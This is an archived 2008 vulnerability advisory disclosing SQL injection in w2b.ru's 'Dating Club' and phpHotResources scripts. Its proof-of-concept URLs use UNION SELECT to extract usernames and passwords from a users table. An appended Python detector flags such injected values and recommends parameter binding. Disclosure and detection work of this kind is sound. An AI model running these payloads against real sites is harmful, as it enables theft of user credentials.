Information Security



Additional information

  Daily summary of security vulnerabilities in web applications (PHP, ASP, JSP, CGI, Perl)

  DOINGSOFT-2008-03-10-001 - XSS issue in BOXiR2

  WiKID wClient-PHP <= 3.0-2 Multiple XSS Vulnerabilities

From: noreply_(at)_aria-security.com <noreply_(at)_aria-security.com>
Date: April 14, 2008
Subject: w2b.ru multiple products SQL Injection

-------------------------------------------------------
|       Aria-Security Team (Persian Security Network)   |
|       http://Aria-Security.com (For English)          |
|       http://Aria-Security.net (For Farsi)            |
|       Greetz:                                         |
|       AurA, NULL, Kinglet, t3rr0r1st, Moromort        |
|               and to all of our staff                 |
|               Discovered by The-0utl4w                |
-------------------------------------------------------
Original Advisory

Vendor: http://w2b.ru
Affected Script: "Dating Club"

PoC
browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=-4214/**/union/**/select/**/1,user_name,password,4,5,6,7,8/**/from/**/users/*&country=&state=&field=body

Other products have the same problems.
Example
phpHotResources:
cat.php?lang=4&kind=-4214+union+select+1,user_name,password,4,5,6,7,8,9+from+users/*
(this syntax might not work but there's sql injection!)

Original link: http://forum.aria-security.com/showthread.php?p=70

Regards,
The-0utl4w
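
A defensive check for the pattern in the PoC URLs above, added here as an example and not part of the original advisory: it flags requests in which a parameter the PoCs treat as numeric carries anything other than an integer, after treating `/**/` comments and `+` as whitespace. The parameter names come from the PoC URLs; the function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters that the PoC URLs on this page pass as numbers (names from the page).
NUMERIC_PARAMS = {"_gender", "age_from", "age_to", "lang", "kind"}
INT_RE = re.compile(r"-?\d+")
# A closed /* ... */ comment, or an unterminated /* running to the end of the value.
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
UNION_RE = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)

def normalise(value):
    """Turn SQL comments used as separators into spaces and collapse whitespace."""
    return re.sub(r"\s+", " ", SQL_COMMENT_RE.sub(" ", value)).strip()

def inspect_request(url):
    """Return (param, reason) findings for one request URL."""
    findings = []
    # parse_qsl percent-decodes values and converts '+' to a space.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name not in NUMERIC_PARAMS or value == "":
            continue
        if INT_RE.fullmatch(value):
            continue  # a plain (possibly negative) integer is what the script expects
        reason = "union-select" if UNION_RE.search(normalise(value)) else "non-integer"
        findings.append((name, reason))
    return findings

# Constructed sample requests (shortened, not copied from real logs).
SAMPLE_REQUESTS = [
    "browse.php?mode=browsebyCat&_gender=0&age_from=15&age_to=30&field=body",
    "browse.php?mode=browsebyCat&_gender=0&age_from=15"
    "&age_to=-1/**/union/**/select/**/1,2/*&field=body",
    "cat.php?lang=4&kind=-1+union+select+1,2/*",
    "cat.php?lang=4&kind=7'",
]

def scan(urls):
    """Map each flagged URL to its findings; clean requests are omitted."""
    return {u: f for u in urls if (f := inspect_request(u))}

if __name__ == "__main__":
    for url, findings in scan(SAMPLE_REQUESTS).items():
        print(findings, url)
```

The same integer test belongs in the application itself: a value that fails it should be rejected before it reaches the query, and the query should bind the value as a parameter rather than concatenate it.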

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod